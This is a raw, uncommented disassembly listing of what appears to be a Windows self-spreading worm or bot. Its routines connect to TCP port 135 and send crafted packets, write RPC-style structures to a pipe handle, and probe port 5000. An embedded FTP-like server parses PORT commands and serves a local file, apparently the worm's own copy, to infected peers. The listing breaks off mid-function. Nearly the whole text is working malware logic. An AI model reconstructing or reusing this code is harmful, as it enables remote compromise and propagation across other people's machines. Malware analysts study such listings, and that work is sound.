mov [ebp+var_8], ebx
mov eax, dword ptr (loc_4154EA+2)[ebx]
mov ecx, dword ptr (loc_4154E7+1)[ebx]
mov [ebp+eax+var_1364], ecx
lea eax, [ebp+var_A68]
push eax
call sub_410838 ; memcpy
push 3Fh
lea eax, [ebp+var_A63]
push offset sub_4154A8
push eax
call sub_410838 ; memcpy
add esp, 48h
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_5B8]
push [ebp+var_4]
push eax
call sub_40C115
lea eax, [ebp+var_3B8]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_A24]
push eax
call sub_410838 ; memcpy
lea eax, [ebp+var_3B8]
push eax
call sub_410826 ; strlen
and [ebp+eax+var_A24], 0
add esp, 20h
xor ecx, ecx
lea eax, [ebp+var_8EBC]
loc_40C393: ; CODE XREF: sub_40C225+17F�j
movzx dx, byte ptr [ebp+ecx+var_1364]
mov [eax], dx
inc ecx
inc eax
inc eax
cmp ecx, esi
jb short loc_40C393
push [ebp+arg_0]
mov esi, 2000h
lea eax, [ebp+var_7364]
push offset dword_415550
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_7364]
push esi
push eax
lea eax, [ebp+var_CEBC]
push eax
call sub_410B2A ; mbstowcs
push offset dword_41554C
push [ebp+arg_0]
call sub_410C94 ; _strcmpi
add esp, 24h
test eax, eax
jz short loc_40C43F
push [ebp+arg_0]
lea eax, [ebp+var_3364]
push offset dword_415544
push esi
push eax
call sub_41089E ; _snprintf
push esi
lea eax, [ebp+var_3364]
push offset dword_41553C
push eax
call sub_410B24 ; strncat
push 20h
lea eax, [ebp+var_8C]
push edi
push eax
call sub_410850 ; memset
lea eax, [ebp+var_3364]
add esp, 28h
mov [ebp+var_78], eax
mov eax, offset byte_417B60
push edi
push eax
push eax
lea eax, [ebp+var_8C]
push eax
call dword_417B9C
loc_40C43F: ; CODE XREF: sub_40C225+1C1�j
push [ebp+arg_0]
lea eax, [ebp+var_5364]
push offset dword_415544
push esi
push eax
call sub_41089E ; _snprintf
push esi
lea eax, [ebp+var_5364]
push offset dword_415530
push eax
call sub_410B24 ; strncat
add esp, 1Ch
lea eax, [ebp+var_5364]
push edi
push edi
push 3
push edi
push 3
push 40000000h
push eax
call ds:dword_411048 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_40C491
loc_40C48A: ; CODE XREF: sub_40C225+370�j
xor esi, esi
jmp loc_40C726
; ---------------------------------------------------------------------------
loc_40C491: ; CODE XREF: sub_40C225+263�j
push 48h
lea eax, [ebp+var_68]
push edi
push eax
call sub_410850 ; memset
push 10h
and [ebp+var_67], 0
pop esi
mov [ebp+var_68], 5
push 1
mov [ebp+var_66], 0Bh
pop eax
mov [ebp+var_65], 3
mov [ebp+var_5C], eax
mov [ebp+var_50], eax
mov [ebp+var_4A], al
mov [ebp+var_38], eax
push esi
lea eax, [ebp+var_48]
push offset dword_41551C
push eax
mov [ebp+var_64], esi
mov [ebp+var_60], 48h
mov [ebp+var_5E], di
mov [ebp+var_58], 10B8h
mov [ebp+var_56], 10B8h
mov [ebp+var_54], edi
mov [ebp+var_4C], di
call sub_410838 ; memcpy
push esi
lea eax, [ebp+var_34]
push offset dword_415508
push eax
mov [ebp+var_24], 2
call sub_410838 ; memcpy
add esp, 24h
lea eax, [ebp+var_6C]
push edi
push eax
lea eax, [ebp+var_68]
push 48h
push eax
push [ebp+var_4]
call ds:dword_411070 ; WriteFile
test eax, eax
jz short loc_40C58C
lea eax, [ebp+var_CEBC]
push eax
call sub_410B18 ; wcslen
lea eax, [eax+eax+12h]
pop ecx
test al, 3
mov [ebp+arg_4], eax
jz short loc_40C540
loc_40C537: ; CODE XREF: sub_40C225+319�j
inc [ebp+arg_4]
test byte ptr [ebp+arg_4], 3
jnz short loc_40C537
loc_40C540: ; CODE XREF: sub_40C225+310�j
cmp byte ptr (loc_4154EF+1)[ebx], 0
push 4
pop esi
jz short loc_40C54F
add [ebp+arg_4], esi
loc_40C54F: ; CODE XREF: sub_40C225+325�j
lea eax, [ebp+var_8EBC]
push eax
call sub_410B18 ; wcslen
pop ecx
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*2+0Eh]
loc_40C563: ; CODE XREF: sub_40C225+343�j
test al, 3
jz short loc_40C56A
inc eax
jmp short loc_40C563
; ---------------------------------------------------------------------------
loc_40C56A: ; CODE XREF: sub_40C225+340�j
add eax, 8
cmp byte ptr (loc_4154EF+1)[ebx], 0
jz short loc_40C57A
add eax, esi
jmp short loc_40C57C
; ---------------------------------------------------------------------------
loc_40C57A: ; CODE XREF: sub_40C225+34F�j
inc eax
inc eax
loc_40C57C: ; CODE XREF: sub_40C225+353�j
push eax
mov [ebp+arg_4], eax
call sub_41082C ; malloc
mov ebx, eax
pop ecx
cmp ebx, edi
jnz short loc_40C59A
loc_40C58C: ; CODE XREF: sub_40C225+2F8�j
push [ebp+var_4]
call ds:dword_4110AC ; CloseHandle
jmp loc_40C48A
; ---------------------------------------------------------------------------
loc_40C59A: ; CODE XREF: sub_40C225+365�j
push [ebp+arg_4]
push edi
push ebx
call sub_410850 ; memset
push esi
push offset dword_415498
push ebx
call sub_410838 ; memcpy
lea eax, [ebp+var_CEBC]
push eax
call sub_410B18 ; wcslen
inc eax
mov [ebx+0Ch], eax
mov [ebx+8], edi
mov eax, [ebx+0Ch]
mov [ebx+4], eax
lea eax, [ebp+var_CEBC]
push eax
lea eax, [ebx+10h]
push eax
call sub_410B1E ; wcscpy
lea eax, [ebp+var_CEBC]
push eax
call sub_410B18 ; wcslen
lea eax, [eax+eax+12h]
add esp, 28h
test al, 3
mov [ebp+arg_0], eax
jz short loc_40C5FB
loc_40C5F3: ; CODE XREF: sub_40C225+3D1�j
inc eax
test al, 3
jnz short loc_40C5F3
mov [ebp+arg_0], eax
loc_40C5FB: ; CODE XREF: sub_40C225+3CC�j
mov ecx, [ebp+var_8]
cmp byte ptr (loc_4154EF+1)[ecx], 0
jz short loc_40C61E
push esi
add eax, ebx
push offset dword_4154A0
push eax
call sub_410838 ; memcpy
add esp, 0Ch
add [ebp+arg_0], esi
mov eax, [ebp+arg_0]
loc_40C61E: ; CODE XREF: sub_40C225+3E0�j
lea esi, [eax+ebx]
lea eax, [ebp+var_8EBC]
push eax
call sub_410B18 ; wcslen
inc eax
add [ebp+arg_0], 0Ch
mov [esi+8], eax
mov [esi+4], edi
mov eax, [esi+8]
mov [esi], eax
lea eax, [ebp+var_8EBC]
push eax
mov eax, [ebp+arg_0]
add eax, ebx
push eax
call sub_410B1E ; wcscpy
lea eax, [ebp+var_8EBC]
push eax
call sub_410B18 ; wcslen
mov ecx, [ebp+arg_0]
add esp, 10h
lea eax, [ecx+eax*2+2]
test al, 3
mov [ebp+arg_0], eax
jz short loc_40C674
loc_40C66C: ; CODE XREF: sub_40C225+44A�j
inc eax
test al, 3
jnz short loc_40C66C
mov [ebp+arg_0], eax
loc_40C674: ; CODE XREF: sub_40C225+445�j
push 8
add eax, ebx
push edi
push eax
call sub_410850 ; memset
mov eax, [ebp+arg_0]
mov esi, [ebp+var_8]
add esp, 0Ch
add eax, 8
cmp byte ptr (loc_4154EF+1)[esi], 0
jz short loc_40C699
mov [eax+ebx], edi
jmp short loc_40C69F
; ---------------------------------------------------------------------------
loc_40C699: ; CODE XREF: sub_40C225+46D�j
mov word ptr [eax+ebx], 1
loc_40C69F: ; CODE XREF: sub_40C225+472�j
push 18h
lea eax, [ebp+var_20]
push edi
push eax
call sub_410850 ; memset
add esp, 0Ch
mov cl, byte ptr (loc_4154EF+1)[esi]
and [ebp+var_1F], 0
and [ebp+var_1E], 0
push 1
mov [ebp+var_16], di
pop eax
mov [ebp+var_C], di
push eax
push 10B8h
push [ebp+arg_4]
lea esi, [ebp+var_20]
neg cl
sbb ecx, ecx
push ebx
and ecx, 2
sub esp, 18h
add ecx, 19h
mov [ebp+var_20], 5
push 6
mov [ebp+var_A], cx
pop ecx
mov [ebp+var_1D], 3
mov edi, esp
push [ebp+var_4]
mov [ebp+var_1C], 10h
mov [ebp+var_14], eax
rep movsd
call sub_40C146
add esp, 2Ch
test eax, eax
jnz short loc_40C711
xor esi, esi
jmp short loc_40C714
; ---------------------------------------------------------------------------
loc_40C711: ; CODE XREF: sub_40C225+4E6�j
push 1
pop esi
loc_40C714: ; CODE XREF: sub_40C225+4EA�j
push [ebp+var_4]
call ds:dword_4110AC ; CloseHandle
push ebx
call sub_410832 ; free
pop ecx
xor edi, edi
loc_40C726: ; CODE XREF: sub_40C225+267�j
push edi
push edi
push [ebp+var_78]
call dword_417BA4
mov eax, esi
jmp short loc_40C738
; ---------------------------------------------------------------------------
loc_40C735: ; CODE XREF: sub_40C225+18�j
; sub_40C225+24�j
push 1
pop eax
loc_40C738: ; CODE XREF: sub_40C225+85�j
; sub_40C225+50E�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C225 endp
; =============== S U B R O U T I N E =======================================
sub_40C73D proc near ; DATA XREF: .data:004168B8�o
; .data:0041692C�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40C225
pop ecx
test eax, eax
pop ecx
jnz short locret_40C75A
push eax
push [esp+4+arg_0]
call sub_40C225
pop ecx
pop ecx
locret_40C75A: ; CODE XREF: sub_40C73D+F�j
retn
sub_40C73D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C75B proc near ; CODE XREF: sub_40C794+131�p
; sub_40C794+15A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_40C789
loc_40C76C: ; CODE XREF: sub_40C75B+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_410AFA ; memcmp
add esp, 0Ch
test eax, eax
jz short loc_40C78F
inc esi
cmp esi, edi
jl short loc_40C76C
loc_40C789: ; CODE XREF: sub_40C75B+F�j
xor eax, eax
loc_40C78B: ; CODE XREF: sub_40C75B+37�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40C78F: ; CODE XREF: sub_40C75B+27�j
push 1
pop eax
jmp short loc_40C78B
sub_40C75B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C794 proc near ; CODE XREF: sub_40B27D+19�p
; sub_40C225+68�p ...
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_4108B0
mov eax, [ebp+arg_4]
push ebx
push esi
dec eax
push edi
jz short loc_40C7DF
dec eax
jz short loc_40C7B5
dec eax
loc_40C7AE: ; CODE XREF: sub_40C794+61�j
xor eax, eax
loc_40C7B0: ; CODE XREF: sub_40C794+49�j
; sub_40C794+176�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40C7B5: ; CODE XREF: sub_40C794+17�j
push 2710h
push 0
push offset a5000 ; "5000"
push [ebp+arg_0]
call sub_403BBB
mov esi, eax
push esi
call sub_403D27
mov eax, esi
add esp, 14h
neg eax
sbb eax, eax
and eax, 3
jmp short loc_40C7B0
; ---------------------------------------------------------------------------
loc_40C7DF: ; CODE XREF: sub_40C794+14�j
push 6
push 1
push 2
call ds:dword_41122C ; socket
mov edi, eax
or ebx, 0FFFFFFFFh
cmp edi, ebx
mov [ebp+arg_4], edi
jz short loc_40C7AE
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_410850 ; memset
add esp, 0Ch
mov [ebp+var_10], 2
push 87h
call ds:dword_411248 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call ds:dword_411254 ; inet_addr
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_411208 ; connect
cmp eax, ebx
jz loc_40C8FF
push esi
push 48h
push offset dword_415558
push edi
call ds:dword_411220 ; send
cmp eax, ebx
jz loc_40C8FF
mov edi, 2000h
push esi
mov esi, ds:dword_411258
lea eax, [ebp+var_2010]
push edi
push eax
push [ebp+arg_4]
call esi ; recv
cmp eax, ebx
jnz short loc_40C879
loc_40C872: ; CODE XREF: sub_40C794+EC�j
; sub_40C794+102�j ...
xor esi, esi
jmp loc_40C8FF
; ---------------------------------------------------------------------------
loc_40C879: ; CODE XREF: sub_40C794+DC�j
cmp [ebp+var_200E], 0Ch
jnz short loc_40C872
push 0
push 18h
push offset dword_4155A4
push [ebp+arg_4]
call ds:dword_411220 ; send
cmp eax, ebx
jz short loc_40C872
push 0
lea eax, [ebp+var_2010]
push edi
push eax
push [ebp+arg_4]
call esi ; recv
mov esi, eax
cmp esi, ebx
jz short loc_40C872
cmp [ebp+var_200E], 2
jnz short loc_40C872
push 10h
push offset loc_4155C0
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40C75B
add esp, 10h
test eax, eax
jz short loc_40C8DF
xor eax, eax
cmp esi, 12Ch
setnl al
inc eax
jmp short loc_40C8FD
; ---------------------------------------------------------------------------
loc_40C8DF: ; CODE XREF: sub_40C794+13B�j
push 10h
push offset dword_4155D4
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40C75B
add esp, 10h
neg eax
sbb eax, eax
and eax, 3
loc_40C8FD: ; CODE XREF: sub_40C794+149�j
mov esi, eax
loc_40C8FF: ; CODE XREF: sub_40C794+A4�j
; sub_40C794+BB�j ...
push [ebp+arg_4]
call ds:dword_411240 ; closesocket
mov eax, esi
jmp loc_40C7B0
sub_40C794 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C90F proc near ; CODE XREF: sub_40B7A2+188�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
xor ebx, ebx
cmp esi, ebx
push edi
jnz short loc_40C944
xor esi, esi
cmp [ebp+arg_4], ebx
jbe short loc_40C9A0
loc_40C925: ; CODE XREF: sub_40C90F+31�j
push 21h
push ebx
call sub_40AADE
mov al, byte_4155F0[eax+eax*4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [esi+ecx], al
inc esi
cmp esi, [ebp+arg_4]
jb short loc_40C925
jmp short loc_40C9A0
; ---------------------------------------------------------------------------
loc_40C944: ; CODE XREF: sub_40C90F+D�j
cmp esi, 7Fh
jnz short loc_40C96F
xor esi, esi
cmp [ebp+arg_4], ebx
jbe short loc_40C9A0
loc_40C950: ; CODE XREF: sub_40C90F+5C�j
push 6
push ebx
call sub_40AADE
mov al, byte_4155F0[eax+eax*4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [esi+ecx], al
inc esi
cmp esi, [ebp+arg_4]
jb short loc_40C950
jmp short loc_40C9A0
; ---------------------------------------------------------------------------
loc_40C96F: ; CODE XREF: sub_40C90F+38�j
xor edi, edi
cmp [ebp+arg_4], ebx
jbe short loc_40C9A0
loc_40C976: ; CODE XREF: sub_40C90F+8F�j
push 21h
push ebx
call sub_40AADE
movsx eax, al
pop ecx
lea eax, [eax+eax*4]
pop ecx
test dword_4155F1[eax], esi
jnz short loc_40C99B
mov ecx, [ebp+arg_0]
mov al, byte_4155F0[eax]
mov [edi+ecx], al
inc edi
loc_40C99B: ; CODE XREF: sub_40C90F+7D�j
cmp edi, [ebp+arg_4]
jb short loc_40C976
loc_40C9A0: ; CODE XREF: sub_40C90F+14�j
; sub_40C90F+33�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40C90F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C9A5 proc near ; CODE XREF: sub_40CA47+40A�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 200h
push ebx
push esi
push 0EA60h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403BBB
mov ebx, eax
add esp, 10h
test ebx, ebx
jz short loc_40C9EE
cmp ebx, 0FFFFFFFFh
jz short loc_40C9EE
push offset aRb ; "rb"
push offset dword_41885C
call sub_41086E ; fopen
mov esi, eax
pop ecx
test esi, esi
pop ecx
jnz short loc_40C9F4
push ebx
call sub_403D49
pop ecx
loc_40C9EE: ; CODE XREF: sub_40C9A5+24�j
; sub_40C9A5+29�j
xor eax, eax
loc_40C9F0: ; CODE XREF: sub_40C9A5+A0�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40C9F4: ; CODE XREF: sub_40C9A5+40�j
push edi
loc_40C9F5: ; CODE XREF: sub_40C9A5+7F�j
test byte ptr [esi+0Ch], 10h
jnz short loc_40CA31
push esi
push 200h
lea eax, [ebp+var_200]
push 1
push eax
call sub_410880 ; fread
mov edi, eax
lea eax, [ebp+var_200]
push edi
push eax
push ebx
call sub_403D54
add esp, 1Ch
cmp edi, eax
jz short loc_40C9F5
push ebx
call sub_403D49
pop ecx
xor edi, edi
jmp short loc_40CA3B
; ---------------------------------------------------------------------------
loc_40CA31: ; CODE XREF: sub_40C9A5+54�j
push ebx
call sub_403D27
pop ecx
push 1
pop edi
loc_40CA3B: ; CODE XREF: sub_40C9A5+8A�j
push esi
call sub_410868 ; fclose
pop ecx
mov eax, edi
pop edi
jmp short loc_40C9F0
sub_40C9A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA47 proc near ; DATA XREF: sub_40D09D+CB�o
var_530 = byte ptr -530h
var_330 = byte ptr -330h
var_32F = byte ptr -32Fh
var_230 = byte ptr -230h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 530h
push ebx
push esi
push edi
mov esi, 200h
push offset dword_4161A8
lea eax, [ebp+var_230]
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_230]
push eax
call sub_410826 ; strlen
mov ebx, [ebp+arg_0]
push eax
lea eax, [ebp+var_230]
push eax
push ebx
call sub_403D54
mov dl, byte_417B60
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_32F]
mov [ebp+var_330], dl
rep stosd
stosw
stosb
xor eax, eax
lea edi, [ebp+var_13]
mov [ebp+var_14], dl
push 0EA60h
stosd
stosb
xor eax, eax
push ebx
mov [ebp+arg_0], eax
mov [ebp+var_18], eax
mov [ebp+var_C], eax
call sub_403DD6
add esp, 24h
loc_40CAC6: ; CODE XREF: sub_40CA47+3C2�j
test eax, eax
jz loc_40CF00
lea eax, [ebp+var_530]
push esi
push eax
push ebx
call sub_403D69
add esp, 0Ch
test eax, eax
jz loc_40CF00
cmp eax, 0FFFFFFFFh
jz loc_40CF00
lea eax, [ebp+var_C]
mov edi, offset dword_4161A4
push eax
lea eax, [ebp+var_530]
push edi
push eax
call sub_405733
add esp, 0Ch
mov [ebp+var_8], eax
test eax, eax
jz loc_40CDFC
lea eax, [ebp+var_C]
push eax
push edi
push 0
call sub_405733
add esp, 0Ch
mov [ebp+var_4], eax
test eax, eax
jnz short loc_40CB31
mov [ebp+var_4], offset byte_417B60
loc_40CB31: ; CODE XREF: sub_40CA47+E1�j
lea eax, [ebp+var_C]
push eax
push edi
push 0
call sub_405733
push [ebp+var_8]
call sub_409CCF
add esp, 10h
cmp eax, dword_416198
jnz short loc_40CB61
mov [ebp+arg_0], 1
push offset dword_416190
jmp loc_40CDD2
; ---------------------------------------------------------------------------
loc_40CB61: ; CODE XREF: sub_40CA47+107�j
cmp eax, dword_416184
jnz short loc_40CB7A
mov [ebp+var_18], 1
push offset dword_41617C
jmp loc_40CDD2
; ---------------------------------------------------------------------------
loc_40CB7A: ; CODE XREF: sub_40CA47+120�j
cmp [ebp+arg_0], 0
jz loc_40CDFC
cmp [ebp+var_18], 0
jz loc_40CDFC
cmp eax, dword_416170
jnz short loc_40CBA0
push offset dword_416168
jmp loc_40CDD2
; ---------------------------------------------------------------------------
loc_40CBA0: ; CODE XREF: sub_40CA47+14D�j
cmp eax, dword_41615C
jnz short loc_40CBB2
push offset dword_416154
jmp loc_40CDD2
; ---------------------------------------------------------------------------
loc_40CBB2: ; CODE XREF: sub_40CA47+15F�j
cmp eax, dword_41614C
jnz short loc_40CBC4
push offset dword_416140
jmp loc_40CDD2
; ---------------------------------------------------------------------------
loc_40CBC4: ; CODE XREF: sub_40CA47+171�j
cmp eax, dword_416134
jz loc_40CC5B
cmp eax, dword_416128
jnz short loc_40CBE2
push offset dword_416120
jmp loc_40CDD2
; ---------------------------------------------------------------------------
loc_40CBE2: ; CODE XREF: sub_40CA47+18F�j
cmp eax, dword_416114
jnz short loc_40CC65
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_28]
push eax
push offset aUUUUUU ; "%u,%u,%u,%u,%u,%u"
push [ebp+var_4]
call sub_410892 ; sscanf
movzx eax, [ebp+var_30]
add esp, 20h
push eax
movzx eax, [ebp+var_24]
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_28]
push eax
push offset dword_412A58
lea eax, [ebp+var_330]
push 100h
push eax
call sub_41089E ; _snprintf
xor eax, eax
add esp, 1Ch
mov ah, [ebp+var_2C]
mov al, [ebp+var_20]
push eax
push offset dword_4160FC
lea eax, [ebp+var_14]
push 6
push eax
call sub_41089E ; _snprintf
add esp, 10h
loc_40CC5B: ; CODE XREF: sub_40CA47+183�j
push offset dword_4160F4
jmp loc_40CDD2
; ---------------------------------------------------------------------------
loc_40CC65: ; CODE XREF: sub_40CA47+1A1�j
cmp eax, dword_4160E8
jnz short loc_40CCE5
push offset aRb ; "rb"
push offset dword_41885C
call sub_41086E ; fopen
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_40CF00
push 2
push 0
push edi
call sub_410886 ; fseek
push edi
call sub_41085C ; ftell
push 0
push 0
push edi
mov [ebp+var_8], eax
call sub_410886 ; fseek
push edi
call sub_410868 ; fclose
add esp, 20h
lea eax, [ebp+var_230]
push [ebp+var_8]
push offset dword_4160DC
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_230]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_230]
push eax
push ebx
call sub_403D54
add esp, 20h
jmp loc_40CDFC
; ---------------------------------------------------------------------------
loc_40CCE5: ; CODE XREF: sub_40CA47+224�j
cmp eax, dword_4160D0
jnz loc_40CE0E
push offset a150 ; "150 -\r\n"
lea eax, [ebp+var_230]
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_230]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_230]
push eax
push ebx
call sub_403D54
push 2710h
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [ebp+var_330]
push eax
call sub_403BBB
add esp, 2Ch
mov [ebp+var_4], eax
test eax, eax
jz loc_40CF00
cmp eax, 0FFFFFFFFh
jz loc_40CF00
push offset aRb ; "rb"
push offset dword_41885C
call sub_41086E ; fopen
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_40CF00
push 2
push 0
push edi
call sub_410886 ; fseek
push edi
call sub_41085C ; ftell
push 0
push 0
push edi
mov [ebp+var_8], eax
call sub_410886 ; fseek
push edi
call sub_410868 ; fclose
add esp, 20h
lea eax, [ebp+var_230]
push offset dword_41885C
push [ebp+var_8]
push offset aX32000Fh1024Ja ; "-x 3 2000 fh 1024 Jan 1 0:00 .\r\ndrwxr-x"...
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_230]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_230]
push eax
push [ebp+var_4]
call sub_403D54
push [ebp+var_4]
call sub_403D27
add esp, 28h
push offset dword_41604C
loc_40CDD2: ; CODE XREF: sub_40CA47+115�j
; sub_40CA47+12E�j ...
lea eax, [ebp+var_230]
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_230]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_230]
push eax
push ebx
call sub_403D54
add esp, 1Ch
loc_40CDFC: ; CODE XREF: sub_40CA47+C7�j
; sub_40CA47+137�j ...
push 0EA60h
push ebx
call sub_403DD6
pop ecx
pop ecx
jmp loc_40CAC6
; ---------------------------------------------------------------------------
loc_40CE0E: ; CODE XREF: sub_40CA47+2A4�j
cmp eax, dword_416040
jnz loc_40CEC9
push offset a150 ; "150 -\r\n"
lea eax, [ebp+var_230]
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_230]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_230]
push eax
push ebx
call sub_403D54
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_330]
push eax
call sub_40C9A5
add esp, 24h
test eax, eax
jz loc_40CF00
push offset dword_41604C
lea eax, [ebp+var_230]
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_230]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_230]
push eax
push ebx
call sub_403D54
push 1
push offset dword_418838
call sub_406AFA
add esp, 24h
lea ecx, [ebp+var_330]
inc eax
push ecx
push eax
push offset aFtp_0 ; "ftp"
push offset unk_416014
push offset dword_4177EC
call sub_408CDE
add esp, 14h
push 3E8h
call ds:dword_4110A4 ; Sleep
jmp short loc_40CF00
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: sub_40CA47+3CD�j
cmp eax, dword_416008
jnz short loc_40CF00
push offset a221 ; "221 -\r\n"
lea eax, [ebp+var_230]
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_230]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_230]
push eax
push ebx
call sub_403D54
add esp, 1Ch
loc_40CF00: ; CODE XREF: sub_40CA47+81�j
; sub_40CA47+9A�j ...
push offset a231 ; "231 -\r\n"
lea eax, [ebp+var_230]
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_230]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_230]
push eax
push ebx
call sub_403D54
push ebx
call sub_403D27
add esp, 20h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_40CA47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF3E proc near ; CODE XREF: sub_40D09D+58�p
var_20C = dword ptr -20Ch
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
mov edi, [ebp+arg_0]
push 32h
push edi
call sub_403DD6
pop ecx
test eax, eax
pop ecx
jz loc_40D097
mov esi, 200h
lea eax, [ebp+var_200]
push esi
push eax
push edi
call sub_403D69
add esp, 0Ch
test eax, eax
jz loc_40D097
cmp eax, 0FFFFFFFFh
jz loc_40D097
lea eax, [ebp+var_200]
push eax
call sub_40539D
lea eax, [ebp+var_200]
mov [esp+20Ch+var_20C], offset dword_4161D0
push eax
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40D097
lea eax, [ebp+var_200]
push offset dword_4161C4
push eax
call sub_410844 ; sprintf
lea eax, [ebp+var_200]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_200]
push eax
push edi
call sub_403D54
push 32h
lea eax, [ebp+var_200]
push esi
push eax
push edi
call sub_403DAD
add esp, 28h
test eax, eax
jz loc_40D097
cmp eax, 0FFFFFFFFh
jz loc_40D097
lea eax, [ebp+var_200]
push eax
call sub_40539D
lea eax, [ebp+var_200]
mov [esp+20Ch+var_20C], offset dword_4161C0
push eax
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40D097
call sub_40AB05
push eax
lea eax, [ebp+var_200]
push offset dword_4161B4
push eax
call sub_410844 ; sprintf
lea eax, [ebp+var_200]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_200]
push eax
push edi
call sub_403D54
push 32h
lea eax, [ebp+var_200]
push esi
push eax
push edi
call sub_403DAD
add esp, 2Ch
test eax, eax
jz short loc_40D097
cmp eax, 0FFFFFFFFh
jz short loc_40D097
lea eax, [ebp+var_200]
push eax
call sub_40539D
lea eax, [ebp+var_200]
mov [esp+20Ch+var_20C], offset dword_4161B0
push eax
call sub_410AEE ; strcmp
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40D099
; ---------------------------------------------------------------------------
loc_40D097: ; CODE XREF: sub_40CF3E+1A�j
; sub_40CF3E+38�j ...
xor eax, eax
loc_40D099: ; CODE XREF: sub_40CF3E+157�j
pop edi
pop esi
leave
retn
sub_40CF3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D09D proc near ; CODE XREF: seg000:0040D1AB�p
var_1B0 = dword ptr -1B0h
var_1AC = byte ptr -1ACh
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1B0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
add esp, 10h
